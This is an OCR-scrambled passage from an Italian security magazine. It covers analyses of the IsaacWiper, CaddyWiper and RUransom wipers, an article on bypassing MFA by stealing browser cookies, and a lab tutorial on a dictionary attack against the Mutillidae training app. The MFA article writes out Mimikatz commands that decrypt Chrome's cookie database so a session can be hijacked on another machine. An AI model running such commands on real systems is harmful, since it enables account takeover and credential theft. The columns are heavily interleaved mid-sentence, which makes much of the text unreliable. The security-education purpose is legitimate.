automaticamente e aggiunte all’elenco. Il tool crea di default una copia telemetria
di backup dei file crittografati prima di tentarne il recupero (che non può di ESET (https://www.
essere garantito al 100%), così da evitare la perdita dei dati. welivesecurity.com/2022/03/01/
Opzione, questa, che può essere deselezionata (se si è già provveduto
isaacwiper-hermeticwizard-
a un backup) per velocizzare l’operazione. Si ricorda che è bene eseguire
il tool con i privilegi di amministratore per consentire al motore wiper-worm-targeting-ukraine/)
lia

di scansione di trovare tutti i file crittografati nel PC. e sul quale il Microsoft Security
Response Center (MSRC) sta
Il decryptor per continuando a indagare.
Il 25 febbraio è stata osservata
HermeticRansom
anche una nuova versione
ita

rilasciato da Avast
di IsaacWiper che include
rende la procedura
i registri di debug. Ciò starebbe
di recupero dati
a indicare che gli aggressori
su Windows non sono stati in grado di
estremamente facile. cancellare alcuni dei sistemi
@

presi di mira e hanno quindi

per generare i byte casuali che
corromperanno la partizione.
Se la partizione è NTFS, invece,
prima di acquisire il CSP con le
necessarie API analizza il file più
critico di questo filesystem,
ossia la tabella file master (MFT)
che tiene traccia di tutti i file sul
volume, della loro posizione
logica nelle directory, la loro
posizione fisica sul disco
e i metadati relativi ai file.
A lavoro completato e una
volta riavviato il sistema,
l'utente vedrà soltanto una
schermata vuota con le parole
“Missing operating system”
(Sistema operativo mancante).
deciso di registrare dei log
(memorizzati nel file
C:\ProgramData\log.txt) per
cercare di capire in quali punti
la procedura di attacco falliva.
UN MALWARE DISTRUTTIVO
IsaacWiper è stato osservato
nelle directory C:\ProgramData
e C:\Windows\System32 sotto
forma di file DLL (cleaner.dll,
cl64.dll, cll.dll) o file EXE (clean.
exe, cl.exe) privi di firma

30

Un esempio dei messaggi di log registrati da IsaacWiper nel file log.txt.
Fonte IBM: https://securityintelligence.com/posts/
new-wiper-malware-used-against-ukranian-organizations
Authenticode. IsaacWiper inizia
il suo processo malevolo
enumerando le unità fisiche (lo
fa chiamando DeviceIoControl()
_n
con il codice di controllo
IOCTL_STORAGE_GET_DEVICE_
NUMBER). Per avviare l’attività
di cancellazione sfrutta
invece CreateFileW()
lia
e DeviceIoControl() con codice
di controllo FSCTL_LOCK_
VOLUME, necessario per
bloccare l’unità [figura #7].
Con l’unità bloccata, il wiper
ita
prende di mira i dischi fisici
collegati al computer
(i PhysicalDrive riconosciuti
da Windows) sovrascrivendo
i primi 0x100000 byte (65.536
@
KB) di queste unità con dati
creati sfruttando il generatore
di numeri pseudocasuali
(PRNG) Mersenne Twister.
Il malware enumera
poi le unità logiche e cancella
ricorsivamente ogni file
presente in ciascuna di esse
sovrascrivendoli con byte
pseudocasuali generati
anch’essi tramite il PRNG
Mersenne Twister.
Se il wiper non è in grado di
aprire un file, lo rinomina come
WIPER
figura #7 per poi sovrascriverlo con i dati
generati dall’algoritmo
Mersenne Twister.
Se non riesce ad accedere
a un volume, nella sua root crea
una directory nascosta con
all’interno un file temporaneo
(per esempio C:\Tmd1234.tmp\
Tmf5432.tmp) che viene
riempito con dati casuali fino
s
a quando lo spazio disponibile
non risulta esaurito.
È interessante notare che la
ew
cancellazione ricorsiva dei file
avviene in un singolo thread.
file temporaneo con suffisso Ciò significa che il wiper
“Tmf” seguito da una stringa richiede molto tempo per
casuale di quattro caratteri cancellare dischi di grandi
(per esempio: Tmf3360.tmp), dimensioni.
CO N T R O
UNA PROTEZIONE IP
I MALWARE W ER
Dai rapporti di utilizzo dei malware distruttivi come HermeticWiper
risulta evidente che gli stessi siano stati creati con il preciso scopo di
colpire l’Ucraina. Il rischio che altre organizzazioni, per esempio quelle
italiane, incontrino questa minaccia è al momento ridotto, ma ciò non
significa che si possa abbassare la guardia. Tra le soluzioni di sicurezza
che risultano più efficaci nel proteggere gli endpoint da questa tipologia
di minacce vi è la piattaforma Falcon di CrowdStrike (https://bit.ly/
sitocrowdstrike) che sfrutta il cloud e l’apprendimento automatico
(basato sull’Intelligenza Artificiale e su algoritmi di Machine Learning)
per rilevare tempestivamente eventuali anomalie e impedire che il
malware possa eseguire ulteriori azioni dannose, come il caricamento
di componenti aggiuntivi. Per fare ciò si basa sul comportamento
di precisi indicatori di attacco (IOA), nonché sull’analisi di tecniche
e procedure (TTP) utilizzate da minacce e attori delle minacce.
Un esempio di come l’apprendimento automatico
basato sul cloud della piattaforma CrowdStrike Falcon
riesca a rilevare HermeticWiper.
31
 SICUREZZA
figura #8

s
ew
CaddyWiper distrugge soltanto sistemi che non hanno il ruolo di domain controller, così da garantire
agli aggressori l’accesso alla rete bersaglio.
(Fonte ESET: https://twitter.com/ESETresearch/status/1503436433134129158).

CADDYWIPER: IL WIPER CaddyWiper si distribuisce Group Policy Object (GPO),

DELL’ASSEDIO tramite un domain controller come HermeticWiper,
_n
Questo malware (DC), un server Windows indica che gli aggressori
adotta un che nell’ambito di un dominio avevano già il controllo
comportamento gestisce le richieste della rete bersaglio.
ormai di autenticazione per la
“standard” sicurezza e gestisce utenti, AGISCE IN BASE AL RUOLO
lia

per un malware gruppi e risorse di rete. Al momento dell’esecuzione,

wiper (non vi sono novità
particolarmente eclatanti):
il suo metodo di distruzione
consiste infatti nel cancellare
ita
Poiché tale gestione avviene CaddyWiper esegue infatti
tramite Active Directory (AD), la funzione DsRoleGetPrimary
emerge che CaddyWiper DomainInformation
è stato progettato per essere per determinare il ruolo

i dati degli utenti utilizzato in situazioni della macchina su cui

e le informazioni in cui l’ambiente AD sia stato è in esecuzione.
delle partizioni dei dischi già compromesso. Se il ruolo di dominio
installati nell’host. Il fatto che sia distribuito tramite risulta essere DsRole_
@

figura #9

L’attributo SeTakeOwnershipPrivilege usato da CaddyWiper per assumere la proprietà di un file bloccato.

Fonte IBM: https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/

32

figura #10
Parte della routine
malevola di CaddyWiper
che provvede alla
cancellazione ricorsiva
dei file. Fonte
ESET: https://twitter.com/
ESETresearch/status/
1503436420886712321/
photo/2
WIPER
per velocizzare le operazioni.
Se un file risulta bloccato
da un altro processo,
CaddyWiper tenta prima di
assumerne la proprietà (tramite
SeTakeOwnershipPrivilege)
e poi riprende nella sua
opera di cancellazione
del file [figura #9].
Completata la distruzione

s
della cartella Users,
il wiper ripete la procedura
su tutte le unità disponibili

RolePrimaryDomain
Controller, allora CaddyWiper
esce dal processo per non
continuare la sua azione
distruttiva [figura #8].
Se invece il sistema non
_n
è un DC, CaddyWiper inizia
ew
a cancellare in modo ricorsivo
tutti i dati all’interno
di C:\Users, inclusi i file nascosti
e del sistema operativo.
Nel caso in cui un file sia
più grande di 10 MB si limita
a distruggere i primi 40960 byte
e solo al termine cancella
le partizioni di tutti i dischi
fisici (Physicaldrive) rilevati
sovrascrivendo i primi 1920
byte con il valore NULL,
come potete vedere nel codice
della [figura#10].

SOM, IL CONTRATTACCO DELL’UCRAINA?

RURAN
lia

Non è soltanto l'Ucraina a essere bersagliata dai malware кибервторжение.txt (Invasione informatica su vasta
wiper. Il primo marzo 2022 il Malware Hunter Team ha scala.txt) manifesta tutta l’ostilità del suo sviluppatore:
segnalato su Twitter (https://bit.ly/ruransomsample) “Il 24 febbraio, il presidente Vladimir Putin ha dichiarato
l’apparizione di un nuovo malware wiper guerra all’Ucraina. Per contrastare questo, io, il creatore
ita

(soprannominato RUransom dal suo sviluppatore)
che, questa volta, ha come obiettivo la Russia.
Secondo il rapporto di TrendMicro, diverse versioni di
questo malware sarebbero state rilevate tra il 26 febbraio
e il 2 marzo 2022. RUransom (scritto in .NET) agisce
@
di RUransom, ho creato questo malware per danneggiare
la Russia […]. Non c’è modo di decifrare i suoi file. Nessun
pagamento, solo danni”. RUransom si diffonde come un
worm copiando l’eseguibile Россия-Украина_Война-
Обновление.doc.exe (Russia-Ucraina aggiornamento

come un ransomware, ma è di fatto un wiper anti-Russia
poiché espressamente progettato per crittografare i file
dei sistemi russi e causarne la distruzione irreversibile
(agisce su tutti i file a eccezione dei file .bak che vengono
invece cancellati direttamente). La nota di riscatto,
contenuta nel file Полномасштабное_
sulla guerra.doc.exe) su tutti i dischi rimovibili e le unità
di rete mappate. Il workflow della crittografia usa
l’algoritmo AES-CBC per generare chiavi casuali
e univoche per ciascun file crittografato. Inoltre, poiché
le chiavi non vengono memorizzate da nessuna parte,
tale processo risulta di fatto irreversibile.

Frammento di codice
in cui il malware verifica se
viene eseguito dalla Russia,
in caso contrario evita
di attaccare il sistema.

33
 SICUREZZA
La doppia autenticazione
_n
E BACATA
lia
er st an n o su b en d o u n attacco simile,
Molti YouTub
perché anche la 2FA n
ita
N o n cl ic ca re su l li n k
L’unico rimedio?
L’
autenticazione
a più fattori (MFA)
@
è un ottimo modo
per aumentare
la sicurezza di applicazioni Web,
sessioni desktop remote, VPN
e di qualunque altra risorsa a cui
un utente possa accedere online.
Introducendo uno o più fattori
aggiuntivi nel processo di
autenticazione è possibile
dimostrare che qualcuno
è effettivamente chi dice di essere
e prevenire una quantità
significativa di furti d’identità
e attacchi basati sulle credenziali.
34
ew
on è sicura.
sbagliato!
NON È INVIOLABILE
Tuttavia, quando si adotta e si
implementa la tecnologia MFA
è importante capire esattamente
cosa può fare e cosa no,
e quali lacune di sicurezza
non vengono colmate.
Sebbene l’MFA sia eccezionale,
non è una panacea per la sicurezza
e dovrebbe essere considerata
come una parte di una strategia
di sicurezza totale.
Una tecnica interessante è l’utilizzo
dei cookie del browser per aggirare
l’MFA con un attacco pass-the-
cookie. In questo articolo
s
si esplorerà questo attacco,
come funziona e quali metodi
di protezione esistono.
COOKIE DEL BROWSER
Ai fini di questa ricerca, la cosa
importante da sapere è che
i cookie del browser sono uno
dei modi in cui le applicazioni Web
memorizzano le informazioni
di autenticazione dell’utente.
Così facendo un sito Web può
mantenervi connessi e non
richiedervi costantemente nome
utente e password ogni volta che
fate click su una nuova pagina.

Ora, cosa succede se quei cookie
di autenticazione cadono
nelle mani sbagliate?
PASS-THE-COOKIE
_n
Fondamentalmente, se si utilizza
la MFA nelle applicazioni Web,
all’utente che effettua il login
verrà richiesto di fornire ulteriori
garanzie di accesso, come
lia
accettare una notifica push
sul proprio dispositivo mobile.
Dopo aver superato tutti questi
test, l’utente può accedere all’app.
A quel punto, viene creato
ita
e memorizzato un cookie del
browser per la sessione.
Se un malintenzionato fosse
in grado di estrarre questi cookie,
potrebbe replicare la sessione
@
dell’utente attaccato,
autenticazione compresa,
in una sessione del browser
completamente separata
su un altro sistema, bypassando
tutti i checkpoint MFA
lungo il percorso.
Questo attacco, che di fondo usa
il phishing per ingannare gli utenti,
è un esempio di quanto si siano
evoluti i cybercriminali nel tempo
ew
ESTRARRE I COOKIE
Il test è basato sul browser
Google Chrome che memorizza
i suoi cookie nella seguente
posizione in un database SQLite:
%localappdata%GoogleChromeUser
DataDefaultCookies
La parte difficile è che quei cookie
vengono crittografati utilizzando
chiavi legate all’utente a cui
appartengono. Quindi avete
bisogno di un modo per ottenere
l’accesso al database dei cookie
e per decrittografare queste
informazioni in testo normale.
Utilizzando Mimikatz (https://
github.com/ParrotSec/mimikatz)
siete in grado di estrarre i cookie
di un utente, anche se sono
crittografati, con questo comando:
dpapi::chrome /
in:“%localappdata%Google
ChromeUser DataDefaultCookies”
/unprotect
2FA
All’URL https://link.springer.com/
article/10.1007/s10207-021-
00548-5 potete leggere un paper
in inglese, ma scritto da tre italiani,
che spiega l’attacco alla 2FA.
che va impartito da riga di
comando in questo modo:
mimikatz.exe privilege::debug
log “dpapi::chrome
s
/in:%localappdata%google
chromeUSERDA~1defaultcookies
/unprotect” exit
Ora che avete i cookie, dovete
solo trasferirli in un’altra sessione
per prendere il controllo
dell’account dell’utente aprendo
un’applicazione Chrome su un
server Kali Linux e utilizzando
l’opzione Ispeziona del browser
per aggiungere nuovi cookie.
Andando su Applicazione >
Cookie si potranno vedere
i cookie correnti che non
includono ESTSAUTH
o ESTSAUTHPERSISTENT,
il che preclude la richiesta
dell’autenticazione a due fattori
sul sito/app target.
Il gioco quindi è fatto.
COME DIFENDERSI
Per prevenire questo tipo
di attacchi possono essere messe
in atto politiche più rigorose sulla
cancellazione dei cookie, evitando
però di far impazzire le persone
con la riautenticazione costante
ogni volta che navigano su un sito.
Le indicazioni di massima, anche
se frustrante per alcuni applicativi,
è non sincronizzare gli account
dei browser, non memorizzare
le password e non cliccare
mai su collegamenti inviati
via email/social se non si ha
la certezza di chi li ha inviati.
35
SICUREZZA

SESTA PARTE

s
Attacco
ew
a d i z i o n a r i o !
izzare un dictionary
Come progettare e real
GLOSSARIO plication reale!
_n
ra to su un a Web ap
DI BASE attack calib

L
LOG POISONING a nostra “palesta per ci hanno permesso di ottenere una
Sotto questo nome ricade pentester”, l’ambiente shell (per giunta persistente)
quella classe di attacchi virtuale (vedi il link https:// sul server Web della rete. Più
lia

basati sull’iniezione di codice bit.ly/palestra_hj) che precisamente, per accedere al server

malevolo all’interno dei file utilizziamo per le esercitazioni, ci ha abbiamo dovuto fare leva su due
di log prodotti da un sistema
consentito sin qui di confrontarci distinte vulnerabilità (LFI, Local File
nel corso del suo
funzionamento ordinario. con una vasta gamma di attacchi Inclusion, e RCE, Remote Command
e di tecniche offensive. Nelle puntate Execution) che affliggono Mutillidae
ita

LOCAL FILE INCLUSION più recenti ci siamo soffermati (la Web application, descritta nel box
È il nome di un attacco sul log poisoning, ideando omonimo, oggetto in questa fase
teso a esfiltrare i file e implementando tecniche che delle nostre attenzioni):
contenuti nel filesystem
locale di un server Web
figura #1
@

(che, è bene sottolineare,

in condizioni normali non
dovrebbero essere accessibili
all’utente Web) sfruttando
un’apposita vulnerabilità
della Web application,
generalmente legata
a un insufficiente controllo
di un input utente.

REMOTE COMMAND
EXECUTION
Gli attacchi di tipo RCE
consentono a un attore
malevolo di forzare
l’esecuzione di comandi
arbitrari su un server remoto. La schermata di login di Mutillidae,
oggetto del nostro attacco.
36
 PENETRATION TEST
Ecco come accedere alla
pagina che riporta tutti figura #2
gli utenti locali della
Web app.
la combinazione di tali
vulnerabilità, unitamente a un
accorto “avvelenamento” del log
auth.log attraverso una
connessione SSH malevola (e alla
contestuale installazione sul server

s
di una Webshell), ci ha consentito
di raggiungere il nostro obiettivo,
“mettendo un piede” all’interno

della rete target.
LOW-HANGING FRUIT
Da questa breve introduzione
appare chiaro come le attività
poste in essere, sebbene
_n
tecnicamente piuttosto “sfidanti”,
non siano state semplici e lineari.
Spesso durante una verifica di
sicurezza le condizioni a contorno
(in primis la complessità e il grado
lia
ew
testare) ci “obbligano” a individuare
soluzioni complesse, che
richiedono competenza,
pianificazione e un certo grado di
esperienza. Non sempre, tuttavia,
le cose stanno così: in determinati
contesti possono essere disponibili
anche vie d’accesso più elementari,
sebbene altrettanto efficaci per
i nostri scopi. Se è vero che nel
corso di un penetration test è
vettori d’attacco (in modo da
individuare il numero maggiore
possibile di falle, permettendo
al cliente di applicare adeguate
contromisure), è altrettanto vero
che sfruttare per prime le più
semplici (ovvero cogliere quelli
che in gergo sono denominati
low-hanging fruit) può
avvantaggiare non poco il nostro
lavoro, mettendoci a disposizione

di protezione dell’infrastruttura da opportuno testare tutti i possibili informazioni e/o canali d’accesso

d i t e s t c o m p l e t o
Un ambiente
ita

Rete
Internet 211.100.1.2 Target
@

Backbone
211.100.1.1 Server
212.100.1.3 FTP
Router
212.100.1.1

210.100.1.2
212.100.1.2
Pentester Server
210.100.1.1 Web

All’URL https://bit.ly/palestra_hj
trovate le istruzioni per creare
la palestra virtuale. 37
SICUREZZA
figura #3 Se doveste imbattervi
in questo errore,
niente paura!

La pagina che riporta

tutti gli utenti locali
della Web app.
in grado di semplificare
l’esecuzione delle attività a più alto
tasso tecnico.
figura #4

s
DICTIONARY ATTACK
In quest’ottica, non dobbiamo

ew
disdegnare attacchi più elementari
come brute force o dictionary
attack, in grado di fornire un
accesso (persino privilegiato,
a seconda dell’account attaccato!)
senza troppi fronzoli. Attenzione:
_n
per “attacchi più elementari” non
intendiamo operazioni eseguibili
“a occhi chiusi” o lanciando in
maniera non curante un qualche di fare il lavoro per conto nostro. le autenticazioni dei servizi FTP e
script in grado (magicamente!?) Piuttosto, stiamo parlando SSH in esecuzione sul server Web:
lia

di attacchi che, pur richiedendo l’unica differenza con il nostro caso

comunque una doverosa è nel tipo di protocollo da utilizzare

Mutillidae preparazione (al pari di qualsiasi

altra attività che un vero pentester
(HTTP) e nel tool impiegato.

esegua sui sistemi target dei propri ZED ATTACK PROXY

ita

Mutillidae è una Web

application didattica,
Open Source e liberamente
installabile da chiunque
intenda migliorare le proprie
capacità di pentester. Rispetto
ad altre Web app simili (come
@
clienti), risultano tecnicamente più
semplici o – quanto meno – più
facilmente ripetibili. In altri termini,
una volta eseguito un dictionary
attack, tutti gli altri saranno
Sebbene Hydra possa essere
considerato uno specialista per
questo tipo di attacchi, per
l’occasione preferiamo far
nuovamente ricorso a Zed Attack

“Damn Vulnerable Web
Application”, che abbiamo visto
nelle puntate precedenti)
si contraddistingue per il suo
approccio basato sulle
vulnerabilità appartenenti alla
lista denominata “OSWAP Top
10”, che racchiude le 10 falle
più diffuse in ambito Web.
Sotto questo profilo Mutillidae
ci offre un ambiente
addestrativo privilegiato,
consentendo di confrontarci
con le diverse incarnazioni
di ciascuna delle vulnerabilità
incluse nella “OSWAP Top 10”.
concettualmente simili,
susseguendosi attraverso
le medesime fasi: dovremo
individuare uno o più username da
attaccare, una wordlist da utilizzare
nella speranza di scoprire le
password degli utenti, scegliere
un tool in grado di effettuare per
conto nostro il login automatizzato
al servizio target, configurarlo
adeguatamente e infine avviare
l’attacco. Nei numeri precedenti,
per esempio, abbiamo spesso
fatto ricorso a Hydra per attaccare
Proxy (ZAP), il tool Open Source
distribuito da OWASP per l’analisi
delle vulnerabilità dei siti Web.
Useremo nuovamente la
funzionalità di fuzzing già vista
all’opera nei numeri precedenti,
adattandola stavolta a un
dictionary attack rivolto contro la
schermata di login all’area privata
di Mutillidae, che possiamo
visualizzare al link [figura #1]
http://www.labpentest.hj/
mutillidae/index.php?page=login.
php.

38

ESTRARRE GLI UTENTI
Prima dell’attacco è necessario
individuare lo username degli
utenti da “craccare”. Si tratta di una
fase preliminare tanto laboriosa
quanto fondamentale per la buona
riuscita del compito: in linea di
massima, a parità di wordlist
utilizzata, a un numero maggiore
di utenti corrisponde un numero
maggiore di successi, ovvero
di password individuate.
Generalmente l’estrazione degli
utenti richiede un certo grado di
interazione con l’applicazione Web:
è necessario navigare le sue pagine
alla ricerca delle “tracce” che
ciascun utente dissemina quando
è impegnato in attività come l’invio
_n
di messaggi pubblici, la
realizzazione di post, l’acquisto di
beni o la pubblicazione di
recensioni. La maggior parte delle
Web app mostra pubblicamente le
lia
informazioni correlate a questo
tipo di attività, che in qualche caso
sono associate al nome utente
(piuttosto che al nome di
battesimo) di chi le ha eseguite.
ita
UTENTI DI MUTILLIDAE
In questo, Mutillidae non fa
eccezione: la Web app offre un
rudimentale blog, a cui possono
@
L’elenco degli utenti locali della Web app.
PENETRATION TEST
accedere sia gli utenti anonimi
sia, soprattutto, quelli registrati.
Particolare ancora più interessante
agli occhi di un pentester,
Mutillidae mette a disposizione
una comodissima interfaccia
per selezionare i post di un singolo
utente, che può essere scelto
attraverso una pratica lista
comprendente tutti gli utenti locali
della Web application. Possiamo
accedervi cliccando sull’apposito
link presente nel menu laterale,
ew
selezionando le voci Others |
JavaScript “Security” | Add to
your blog [figura #2]. Qualora
la Web app dovesse restituirvi una
pagina d’errore [figura #3], non
occorre disperarsi: si tratta di un
problema nel link, al quale si può
porre rimedio sostituendo
l’indirizzo del server Web
(www.labpentest.hj) al termine
“localhost”, in modo da ottenere
l’URL [figura #4] http://www.
labpentest.hj/mutillidae/index.
php?page=view-someones-blog.
php.
LISTA DEGLI UTENTI
Se clicchiamo sulla lista di selezione
con etichetta Please Choose
Author possiamo
figura #5
I post pubblicati nella Web app.
vedere l’elenco degli utenti della
Web app [figura #5], compreso
(per ultimo) l’utente hj che
abbiamo creato nelle puntate
precedenti. A questo punto,
selezionando il nome di uno degli
utenti e premendo il pulsante View
Blog entries, possiamo
visualizzare i post di un utente
specifico; viceversa, se
s
selezioniamo l’opzione Show all,
abbiamo l’occasione di esaminare
i post di tutti gli utenti [figura #6].
In questa sede, tuttavia, non siamo
interessati ai post quanto piuttosto
agli utenti stessi che li hanno
prodotti: uno dei dati da dare
in pasto a ZAP per avviare il
dictionary attack contro il form
di autenticazione a Mutillidae è
costituito proprio dall’elenco degli
username di tali utenti. Il modo più
rapido per accedere a questo
elenco è estrarlo dal codice HTML
della pagina: dal browser,
selezioniamo View HTML, quindi
individuiamo il codice [figura #7]
relativo alla select list che ci
consente di impostare il filtro per
autore nella visualizzazione dei
post (l’operazione è più rapida e
semplice se si cerca, all’interno del
figura #6
39
SICUREZZA
Il codice HTML relativo alla
_n
lia
codice, il tag </option>). Copiamo
quindi la porzione di codice HTML
ita
all’interno di un file che
denomineremo utenti-grezzi.txt:
al suo interno troveremo la lista
degli username da sottoporre
all’attacco, ma prima che questa
@
possa essere concretamente
utilizzata c’è bisogno ancora
di un po’ di lavoro.
FORMATTARE LA LISTA
In linea di massima, infatti, i tool
per l’esecuzione di brute force
o di dictionary attack accettano
e gestiscono in input due liste
separate (una per gli username,
una per le password da utilizzare)
a patto che queste siano
formattate in modo che ciascuna
riga contenga una singola voce.
40
figura #7
select list per la scelta
dell’utente locale di cui
visualizzare i post.
ew
figura #8
La schermata
di ZAP che
consente
l’inserimento dei
nomi utenti da
attaccare sotto
forma di lista
in cui ogni riga
corrisponde a un
nome utente.
Lo abbiamo visto qualche numero
fa con Hydra, ma l’interfaccia
di fuzzing di ZAP si comporta nel
medesimo modo, consentendoci
di inserire username e password
sotto forma di un elenco di
stringhe suddivise in righe
[figura #8] oppure estraendo tale
elenco direttamente da un file
di testo formattato nel medesimo
modo [figura #9].
CREIAMO LO SCRIPT
Per trasformare la nostra lista
di utenti nel medesimo formato
abbiamo due strade: o ce ne
occupiamo manualmente, oppure
realizziamo un piccolo script
che lo faccia per conto nostro.
Considerata la nostra pigrizia
atavica (ma anche che le
dimensioni coinvolte in uno
scenario reale potrebbero essere
eccessive per un lavoro
esclusivamente di tipo manuale),
cogliamo al balzo l’idea di realizzare
un piccolo script Python, in modo
da allenare anche quelle skill
da sviluppatori che tornano
sicuramente utili a qualsiasi
aspirante penetration tester.
s
Concettualmente, il lavoro dello
script non è complesso: all’interno
del codice HTML estratto dalla
pagina, infatti, i nomi degli utenti
sono compresi tra il tag <option>
e il tag </option>. Per esempio,
per il primo utente (admin),
abbiamo [figura #7]:
<option value=“admin”>admin</
option>
Per il secondo
<option
value=“adrian”>adrian</option>
e così via. Recupereremo il file che
avevamo chiamato utenti-grezzi.txt
e lo daremo in pasto allo script
Python così che possa effettuarne
il parsing alla ricerca dei nomi
utente.
IL CODICE
Per semplificare
l’implementazione, possiamo
affinare ulteriormente la nostra
strategia, individuando (e
stampando in output) le stringhe
comprese tra il tag </option>
e il carattere ‘>’ immediatamente
precedente. Il codice risultante,
riportato in [figura #10], può
essere suddiviso concettualmente
in tre parti.
1 l’apertura del file in
lettura, con relativo

controllo degli eventuali
errori d’accesso:
nomefile=“utenti-grezzi.txt”
try:
_n
file=open(nomefile,“r”);
except:
print(“Non riesco ad
aprire il file ” + nomefile);
exit();
lia
2 il ciclo di lettura, che:
• estrae per ciascuna riga del file
i nomi utente ivi presenti, ottenuti
mediante stampa a video della
ita
stringa compresa tra il tag
</option> (a cui punta la variabile
fine) e il carattere ‘>’
immediatamente precedente
(a cui punta la variabile inizio),
@
estremi esclusi;
• si interrompe (il cliclo while(1)
è virtualmente senza fine) solo
una volta terminata la lettura del
file: al verificarsi di tale evento,
viene sollevata un’eccezione
prontamente catturata dalla
clausola except, con conseguente
esecuzione dell’istruzione
break che determina l’effettiva
uscita dal ciclo;
for line in file:
PENETRATION TEST
L’ESECUZIONE
figura #9 A questo punto non ci resta
che salvare il codice con il nome
La schermata di ZAP pulisciUtente.py e mandarlo
che consente in esecuzione, con il comando
l’inserimento delle
# python pulisciUtente.py
password da utilizzare
per l’attacco, stavolta
per ottenere la tanto agognata lista
prelevate da un file di
degli utenti di Mutillidae contro
testo opportunamente
s
i quali scatenare il nostro attacco
formattato.
[figura #11]. Come possiamo
notare, nell’elenco figura anche
ew
l’utente hj, da noi creato nelle
fine=-1; precedenti puntate per agevolare
while (1): la verifica di sicurezza: è bene
inizio=fine+1; ricordarci di escluderlo dall’attacco,
try: in quanto cercare di forzarne la
password (da noi stessi impostata!)
costituisce solo un’inutile perdita
fine=line. di tempo e di risorse.
index(“</option>”,inizio);
inizio=line. E LA WORDLIST?
rindex(“>”,inizio,fine)+1; Prima di sferrare l’attacco ci rimane
un’ultima attività: scegliere
print(line[inizio:fine]); il dizionario da utilizzare. A tal
except: riguardo dobbiamo sfuggire dalla
break; tentazione di optare per la wordlist
più corposa a nostra disposizione,
3 a chiusura del file in quanto non sempre “grande
è meglio”. Una wordlist di 1.000
file.close(); potenziali password, anche se
figura #10
Il codice del
nostro script
Python per
l’estrazione
dell’elenco
di utenti da
attaccare.
41
SICUREZZA
figura #12

figura #11

Il risultato
dell’esecuzione

s
La directory da cui scegliamo le wordlist
dello script. da utilizzare per i dictionary attack.

impiegata per l’attacco di soli 17
utenti (avendo già escluso l’utente
hj) comporta l’esecuzione di ben
17.000 tentativi di login, da
sommare a quelli degli utenti
ordinari (tutt’altro che trascurabili,
_n
se stiamo effettuando una verifica
di sicurezza su un sistema di
produzione!). Si tratta di un carico
aggiuntivo che, se nel nostro caso
specifico non comporta particolari
lia
ew
ne comporterebbe inevitabilmente
la scoperta o, peggio, sarebbe
trattato al pari di un attacco
informatico vero e proprio.
L’ATTACCO
Per fortuna la directory /usr/
share/wordlists della distro Kali
installata sulla VM Pentester
è ricca di dizionari di ogni tipo e
dimensione: noi ci soffermeremo
sufficiente varietà di password
da provare per ciascun account
presente nella lista. Nulla ci vieta,
poi, di effettuare un dictionary
attack “su più ondate”, andando
ad affinare (e ampliare) il dizionario
utilizzato di pari passo con il
progredire dell’attacco: in questo
modo la wordlist http_default_
password.txt sarà utilizzata per
provare a “rompere” la password

problematiche (a eccezione del
tempo d’attesa necessario
all’esecuzione dei tentativi di login),
deve essere opportunamente
vagliato insieme al titolare
ita
su quelli contenuti nella
sottodirectory metasploit [figura
#12], impiegati dall’omonimo tool
ma disponibili anche al di fuori del
software prodotto da Rapid7. Più
di tutti gli utenti, ma solo quelli più
“resistenti” (che, auspicabilmente,
saranno in numero minore)
si vedranno scatenare contro le
wordlist più evolute e/o corpose.

dell’infrastruttura testata, al fine
di scongiurare ogni pericolo di
intaccare la disponibilità dei servizi
oggetto di verifica. Come se non
bastasse, poi, in determinate
@
precisamente, inizieremo con la Ma questa è un’altra storia, che
wordlist http_default_password. vedremo nel prossimo numero...
txt, che conta appena 19
potenziali password [figura
#13]: in questo modo, se

tipologie di verifica (per esempio da un lato i tempi d’attesa

quelle di tipo double-blind, pensate
anche per “testare” non solo
l’infrastruttura target, ma anche
il grado di reattività, le conoscenze
e le capacità di gestione di un
incidente di sicurezza del personale
deputato alla gestione dei servizi),
il comparto IT del cliente non è
assolutamente a conoscenza delle
attività dei pentester: di
conseguenza, un’attività
“rumorosa” come un tool che
esegua migliaia di tentativi di login
saranno mantenuti bassi
(ma comunque nell’ordine
di una decina di secondi,
dovendo effettuare oltre
300 tentativi di login alla
medesima Web
application), dall’altro
disporremo di una
La wordlist che
utilizzeremo per
l’attacco.

42
 s
ew
_n
lia

HOW TO
ita

Pixelling Testi pixellati, ora craccati!

@

Proteggere i propri segreti pixellando le immagini non è più un metodo sicuro.............................. 44

scocciatori Come rendere visibile un numero privato

C’è un modo gratuito per “smascherare” chi effettua telefonate usando il prefisso #31#...............48

filesystem Alla scoperta di NTFS, terza parte

Vediamo come il filesystem NTFS, tipico dei sistemi Windows, conserva i file................................... 52
HOW TO

TESTI PIXELLATI, ORA

CRACCATI! Pixellatura, sfocatura, spirale?
Se usate ancora questi filtri per
nascondere i vostri segreti più

s
intimi, allora sappiate che…

I
ew
IN BREVE l pixeling (o mosaicing) è una perse durante l’elaborazione del
particolare tecnica di offuscamento processo, non si tratta di una
Ecco come funziona
che tramite algoritmi di sfocatura procedura totalmente distruttiva
il tool che permette
di riconoscere gli (blurring) diffonde i pixel cercando dei pixel, quindi molte di queste
elementi pixellati di imitare i problemi di messa a fuoco informazioni rimangono. E sono
nelle foto o all’interno delle fotocamere, riducendo così la proprio queste che, sapendo come
_n
dei testi. risoluzione e la qualità delle immagini. agiscono tali filtri, si possono usare per
DIFFICOLTÀ Gli algoritmi di pixellatura più usati (in ricostruire l’informazione originale.
software come GIMP, Photoshop, ecc.),
detti “filtri a scatola lineare” (di tipo L’ALLERTA DEI RICERCATORI
deterministico), dividono l’immagine Negli anni, diversi ricercatori hanno
lia

in una griglia di blocchi di pixel e per cercato di dimostrare l’inefficacia di

L’algoritmo di pixellatura
ciascun blocco viene calcolato il valore questa tecnica in termini di sicurezza,
“a scatola lineare” divide
l’immagine in una griglia medio dei pixel presenti. Infine, si proponendo soluzioni concettualmente
e sostituisce il colore di sovrascrivono tutti i pixel del blocco analoghe tra loro: quando non sono
ciascun blocco con quello con il loro valore medio calcolato. disponibili informazioni sufficienti a
ita

derivante dalla media Si ottiene così un’immagine finale ricostruire l’immagine, si può procede
dei blocchi presenti
incomprensibile a chi la osserva. a pixellare dati simili per verificare se
nell’immagine originale
in quella stessa area. Sebbene alcune informazioni vengano corrispondono al campione pixellato.

figura #1
